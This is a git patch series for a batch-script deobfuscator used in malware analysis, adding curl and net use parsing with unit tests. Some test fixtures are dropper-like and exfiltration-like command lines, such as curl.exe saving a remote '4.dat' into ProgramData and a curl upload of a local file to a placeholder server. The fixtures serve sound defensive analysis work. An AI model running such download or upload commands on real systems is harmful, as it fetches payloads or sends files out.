a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -119,7 +119,7 @@ def __init__(self, complex_one_liner_threshold=4): "__compat_layer": "DetectorsMessageBoxErrors", } - # There are 211 lines coming out of curl --help, so I won't be parsing all the options + # There are 211 lines coming out of curl --help, so we won't parse all the options self.curl_parser = argparse.ArgumentParser() # Data could be had multiple time, but since we don't use it, we can ignore it self.curl_parser.add_argument("-d", "--data", dest="data", help="Data to send") @@ -165,7 +165,7 @@ def find_closing_paren(self, statement): start_command = 0 for char in statement: # print(f"C:{char}, S:{state}") - if state == "init": # init state + if state == "init": if char == '"': # quote is on state = "str_s" elif char == "^": @@ -280,7 +280,7 @@ def get_commands(self, logical_line): start_command = 0 for char in logical_line: # print(f"C:{char}, S:{state}") - if state == "init": # init state + if state == "init": if char == '"': # quote is on state = "str_s" elif char == "^": @@ -302,7 +302,8 @@ def get_commands(self, logical_line): counter += 1 - last_com = logical_line[start_command:].strip() + # Remove leading spaces/tabs and trailing newlines + last_com = logical_line[start_command:].lstrip().rstrip("\r\n") if last_com != "": for part in self.get_commands_special_statement(last_com): yield part @@ -319,8 +320,7 @@ def get_value(self, variable): matches = re.finditer(str_substitution, variable, re.MULTILINE) value = "" - - for matchNum, match in enumerate(matches): + for match in matches: var_name = match.group("variable").lower() if var_name in self.variables: value = self.variables[var_name] @@ -736,10 +736,10 @@ def interpret_command(self, normalized_comm): if line_is_comment(normalized_comm): return - # We need to keep the last space in case the command is "set EXP=43 " so that the value will be "43 " + # We need to keep trailing spaces in case the command is "set EXP=43 ", so that the value will be "43 " # normalized_comm = normalized_comm.strip() - # remove paranthesis + # Remove parenthesis index = 0 last = len(normalized_comm) - 1 while index < last and (normalized_comm[index] == " " or normalized_comm[index] == "("): @@ -763,7 +763,7 @@ def interpret_command(self, normalized_comm): if len(normalized_comm_lower.split("/")[0]) < len(command): command = normalized_comm_lower.split("/")[0] - # Some commands like set cannot be split by double-quotes, but cmd and powershell can. + # Some commands like `set` cannot be split by double quotes, but `cmd` and `powershell` can. if '""' in command: ori_cmd_len = len(command) command = command.replace('""', "") @@ -778,7 +778,7 @@ def interpret_command(self, normalized_comm): command = self.modified_filesystem[command]["src"] if command == "call": - # TODO: Not a perfect interpretation as the @ sign of the recursive command shouldn't be remove + # TODO: Not a perfect interpretation as the @ sign of the recursive command shouldn't be removed. # This shouldn't work: # call @set EXP=43 # But this should: @@ -807,7 +807,7 @@ def interpret_command(self, normalized_comm): return if command == "set": - # interpreting set command + # Interpreting `set` command var_name, var_value = self.interpret_set(normalized_comm[3:]) if var_value == "": if var_name.lower() in self.variables: From 726c29f2849801d746de1792902b0cb965c9319b Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Tue, 11 Jun 2024 17:53:57 +0000 Subject: [PATCH 13/17] Handle multi-line commands --- batch_deobfuscator/batch_interpreter.py | 4 +-- tests/test_full_script.py | 46 +++++++++++++++++++++++++ tests/test_variables.py | 21 ----------- 3 files changed, 48 insertions(+), 23 deletions(-) create mode 100644 tests/test_full_script.py delete mode 100644 tests/test_variables.py diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 71523f0..9293868 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -152,12 +152,12 @@ def read_logical_line(self, path): with open(path, "r", encoding="utf-8", errors="ignore") as input_file: logical_line = "" for line in input_file: - if not line.endswith("^"): + if not line.rstrip("\r\n").endswith("^"): logical_line += line yield logical_line logical_line = "" else: - logical_line += line + "\n" + logical_line += line.rstrip("\r\n")[:-1] def find_closing_paren(self, statement): state = "init" diff --git a/tests/test_full_script.py b/tests/test_full_script.py new file mode 100644 index 0000000..d3a935a --- /dev/null +++ b/tests/test_full_script.py @@ -0,0 +1,46 @@ +import os +import tempfile + +from batch_deobfuscator.batch_interpreter import BatchDeobfuscator + + +# Taken from 675228b0360a56b2d3ed661635de4359d72089cb0e089eb60961727706797751 +# A Grub file that contains a batch script +# The value for the variable in_check contain itself, so it create an infinite recursion when expanding it +def test_in_check_infinite_recursion(): + deobfuscator = BatchDeobfuscator() + script = rb""" +if "%back%"=="" || set back= && set filefnd= && set in_check= ! call Fn.11 "%in_check%" "1" && exit +call Fn.11 "%in_check%" "1" && exit 1 +""" + with tempfile.TemporaryDirectory() as temp_dir: + with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: + tf.write(script) + tf.flush() + deobfuscator.analyze(tf.name, temp_dir) + + # No assert, just making sure it does not error out. + + +def test_concat_logical_lines(): + deobfuscator = BatchDeobfuscator() + script = rb"""REM download log file +curl -X GET --fail ^ +-H "Accept: application/octet-stream" ^ +http://server.org/data?accept=data >>met\resultat\output.log""" + with tempfile.TemporaryDirectory() as temp_dir: + with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: + tf.write(script) + tf.flush() + bat_filename, _ = deobfuscator.analyze(tf.name, temp_dir) + + with open(os.path.join(temp_dir, bat_filename), "rb") as f: + result = f.read() + lines = result.split(b"\r\n") + + assert len(lines) >= 2 + assert lines[0] == b"REM download log file" + assert lines[1] == ( + rb'curl -X GET --fail -H "Accept: application/octet-stream" ' + rb"http://server.org/data?accept=data >>met\resultat\output.log" + ) diff --git a/tests/test_variables.py b/tests/test_variables.py deleted file mode 100644 index 6a502cb..0000000 --- a/tests/test_variables.py +++ /dev/null @@ -1,21 +0,0 @@ -import tempfile - -from batch_deobfuscator.batch_interpreter import BatchDeobfuscator - - -# Taken from 675228b0360a56b2d3ed661635de4359d72089cb0e089eb60961727706797751 -# A Grub file that contains a batch script -# The value for the variable in_check contain itself, so it create an infinite recursion when expanding it -def test_in_check_infinite_recursion(): - deobfuscator = BatchDeobfuscator() - script = rb""" -if "%back%"=="" || set back= && set filefnd= && set in_check= ! call Fn.11 "%in_check%" "1" && exit -call Fn.11 "%in_check%" "1" && exit 1 -""" - with tempfile.TemporaryDirectory() as temp_dir: - with tempfile.NamedTemporaryFile(dir=temp_dir) as tf: - tf.write(script) - tf.flush() - deobfuscator.analyze(tf.name, temp_dir) - - # No assert, just making sure it does not error out. From 65e575794218f951bf323e3fb754cea08898647e Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 13 Jun 2024 12:00:33 +0000 Subject: [PATCH 14/17] Add more --data* option handling in curl --- batch_deobfuscator/batch_interpreter.py | 12 ++++++++++- tests/test_curl.py | 27 +++++++++++++++++++++++++ 2 files changed, 38 insertions(+), 1 deletion(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 9293868..8a9f42b 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -122,7 +122,16 @@ def __init__(self, complex_one_liner_threshold=4): # There are 211 lines coming out of curl --help, so we won't parse all the options self.curl_parser = argparse.ArgumentParser() # Data could be had multiple time, but since we don't use it, we can ignore it - self.curl_parser.add_argument("-d", "--data", dest="data", help="Data to send") + self.curl_parser.add_argument( + "-d", + "--data", + "--data-ascii", + "--data-binary", + "--data-raw", + "--data-urlencode", + dest="data", + help="Data to send", + ) self.curl_parser.add_argument("-o", "--output", dest="output", help="Write to file instead of stdout") self.curl_parser.add_argument("-H", "--header", dest="header", help="Extra header to include") self.curl_parser.add_argument( @@ -760,6 +769,7 @@ def interpret_command(self, normalized_comm): normalized_comm_lower = normalized_comm.lower() command = normalized_comm_lower.split()[0] + # In case the command is `set/p`, we want only `set` if len(normalized_comm_lower.split("/")[0]) < len(command): command = normalized_comm_lower.split("/")[0] diff --git a/tests/test_curl.py b/tests/test_curl.py index a411b90..a330fe5 100644 --- a/tests/test_curl.py +++ b/tests/test_curl.py @@ -51,6 +51,33 @@ {"src": "http://localhost:5572/rc/noop?rutabaga=3&potato=4", "dst": None}, ), ), + ( + "curl.exe -o C:\\ProgramData\\Pterds\\HErtop.pos 1.1.1.1/4.dat", + ( + "curl.exe -o C:\\ProgramData\\Pterds\\HErtop.pos 1.1.1.1/4.dat", + {"src": "1.1.1.1/4.dat", "dst": "C:\\ProgramData\\Pterds\\HErtop.pos"}, + ), + ), + ( + r'curl -X POST --fail -H "Content-type: application/x-www-form-urlencoded" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" http://server.com/data?style=table', + ( + r'curl -X POST --fail -H "Content-type: application/x-www-form-urlencoded" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" http://server.com/data?style=table', + { + "src": "http://server.com/data?style=table", + "dst": None, + }, + ), + ), + ( + r'curl -X POST --fail -H "Content-type: application/octet-stream" -H "Accept: application/json" -H "Content-Disposition: attachment; filename=myupload.file" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" --data-binary "@some\path\with\my\file.data" http://server.com/upload?overwrite=true', + ( + r'curl -X POST --fail -H "Content-type: application/octet-stream" -H "Accept: application/json" -H "Content-Disposition: attachment; filename=myupload.file" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" --data-binary "@some\path\with\my\file.data" http://server.com/upload?overwrite=true', + { + "src": "http://server.com/upload?overwrite=true", + "dst": None, + }, + ), + ), ], ) def test_curl_extraction(statement, download_trait): From 6ce5d18078c7c97a6f6099cfee9c4c97c7aac3d0 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 13 Jun 2024 12:02:39 +0000 Subject: [PATCH 15/17] Split curl command using windows command spilling instead of shlex --- batch_deobfuscator/batch_interpreter.py | 54 ++++++++++++++++++++++++- tests/test_curl.py | 7 ++++ 2 files changed, 60 insertions(+), 1 deletion(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 8a9f42b..c3aa38a 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -7,6 +7,7 @@ import shlex import shutil import string +import sys import tempfile from collections import defaultdict from urllib.parse import urlparse @@ -53,6 +54,57 @@ def line_is_comment(line: str) -> bool: return False +# Taken from https://stackoverflow.com/questions/33560364/python-windows-parsing-command-lines-with-shlex +# An alternative would be https://github.com/smoofra/mslex or https://github.com/petamas/oslex (which use mslex) +def cmdline_split(s, platform="this"): + """Multi-platform variant of shlex.split() for command-line splitting. + For use with subprocess, for argv injection etc. Using fast REGEX. + + platform: 'this' = auto from current platform; + 1 = POSIX; + 0 = Windows/CMD + (other values reserved) + """ + if platform == "this": + platform = sys.platform != "win32" + if platform == 1: + RE_CMD_LEX = r""""((?:\\["\\]|[^"])*)"|'([^']*)'|(\\.)|(&&?|\|\|?|\d?\>|[<])|([^\s'"\\&|<>]+)|(\s+)|(.)""" + elif platform == 0: + RE_CMD_LEX = r""""((?:""|\\["\\]|[^"])*)"?()|(\\\\(?=\\*")|\\")|(&&?|\|\|?|\d?>|[<])|([^\s"&|<>]+)|(\s+)|(.)""" + else: + raise AssertionError("unkown platform %r" % platform) + + args = [] + accu = None # collects pieces of one arg + for qs, qss, esc, pipe, word, white, fail in re.findall(RE_CMD_LEX, s): + if word: + pass # most frequent + elif esc: + word = esc[1] + elif white or pipe: + if accu is not None: + args.append(accu) + if pipe: + args.append(pipe) + accu = None + continue + elif fail: + raise ValueError("invalid or incomplete shell string") + elif qs: + word = qs.replace('\\"', '"').replace("\\\\", "\\") + if platform == 0: + word = word.replace('""', '"') + else: + word = qss # may be even empty; must be last + + accu = (accu or "") + word + + if accu is not None: + args.append(accu) + + return args + + class BatchDeobfuscator: def __init__(self, complex_one_liner_threshold=4): self.file_path = None @@ -494,7 +546,7 @@ def interpret_curl(self, cmd): # Batch specific obfuscation that is not handled before for echo/variable purposes, can be stripped here cmd = cmd.replace('""', "") try: - split_cmd = shlex.split(cmd, posix=False) + split_cmd = cmdline_split(cmd, platform=0) except ValueError: # Probably a "No closing quotation" # Usually generated from corrupted or non-batch files diff --git a/tests/test_curl.py b/tests/test_curl.py index a330fe5..603197a 100644 --- a/tests/test_curl.py +++ b/tests/test_curl.py @@ -78,6 +78,13 @@ }, ), ), + ( + r'curl -X POST -H "Content-type: application/json" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" -d "{\"someParameters\": [{\"name\":\"FILE_NAME\" \"value\": \"filename.file\"} {\"name\":\"OTHER_PARAM\" \"value\": \"TRUE\"} {\"name\":\"COMPLEX_PARAM\" \"value\": [\"some\" \"other\" \"value\"]} ]}" http://server.com/data.page >>some\file\output.json', + ( + r'curl -X POST -H "Content-type: application/json" -H "Accept: application/json" -H "Authorization: Bearer token=aaaaaaaaaaaaaaaaa" -d "{\"someParameters\": [{\"name\":\"FILE_NAME\" \"value\": \"filename.file\"} {\"name\":\"OTHER_PARAM\" \"value\": \"TRUE\"} {\"name\":\"COMPLEX_PARAM\" \"value\": [\"some\" \"other\" \"value\"]} ]}" http://server.com/data.page >>some\file\output.json', + {"src": "http://server.com/data.page", "dst": None}, + ), + ), ], ) def test_curl_extraction(statement, download_trait): From e515c648b7763924a6c86ca70049636e96a299c8 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Mon, 24 Jun 2024 15:58:40 +0000 Subject: [PATCH 16/17] Handle '@ ' broken deobfuscation --- batch_deobfuscator/batch_interpreter.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index c3aa38a..77d4c8b 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -819,6 +819,10 @@ def interpret_command(self, normalized_comm): if normalized_comm[0] == "@": normalized_comm = normalized_comm[1:] + # Verify that the command isn't '@ ' + if not normalized_comm.strip(): + return + normalized_comm_lower = normalized_comm.lower() command = normalized_comm_lower.split()[0] # In case the command is `set/p`, we want only `set` From 2be429109b4a654896492a92950659c4f80ab5d6 Mon Sep 17 00:00:00 2001 From: gdesmar <75089569+gdesmar@users.noreply.github.com> Date: Thu, 15 Aug 2024 15:49:44 +0000 Subject: [PATCH 17/17] Handle unquoted net use commands --- batch_deobfuscator/batch_interpreter.py | 4 +++- tests/test_net.py | 31 +++++++++++++++++++++++++ 2 files changed, 34 insertions(+), 1 deletion(-) diff --git a/batch_deobfuscator/batch_interpreter.py b/batch_deobfuscator/batch_interpreter.py index 77d4c8b..89a4df8 100644 --- a/batch_deobfuscator/batch_interpreter.py +++ b/batch_deobfuscator/batch_interpreter.py @@ -786,7 +786,9 @@ def interpret_net(self, cmd): info["password"] = extra_params.pop(0) if extra_params: - raise Exception(f"Too many parameters in net use: '{cmd}'") + # Either we're handling a corrupted script, or the path contains spaces without being rightly quoted + # In that case, we'll assume no password were provided and will use all extra params as the server + info["server"] = " ".join([info["server"], info.pop("password")] + extra_params) if not info["options"]: info.pop("options") diff --git a/tests/test_net.py b/tests/test_net.py index 2b27846..594b3d4 100644 --- a/tests/test_net.py +++ b/tests/test_net.py @@ -146,6 +146,37 @@ def test_net_use_space(): ) +def test_net_use_space_no_quotes(): + deobfuscator = BatchDeobfuscator() + cmd = r"NET USE Z: \\server\folder\No Quotes For Some Reason" + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "Z:", + "server": r"\\server\folder\No Quotes For Some Reason", + }, + ) + + +def test_net_use_from_text_blob(): + deobfuscator = BatchDeobfuscator() + # Found in 8d06dd9b902bd1d3fcf55ced6ceb2488903c337dde28e7ad1a9c94e9dc5cfd38 + cmd = r"net use x: \\\C$)." + deobfuscator.interpret_command(cmd) + assert len(deobfuscator.traits) == 1 + assert len(deobfuscator.traits["net-use"]) == 1 + assert deobfuscator.traits["net-use"][0] == ( + cmd, + { + "devicename": "x:", + "server": r"\\\C$).", + }, + ) + + def test_net_use_script(): deobfuscator = BatchDeobfuscator() script = rb"""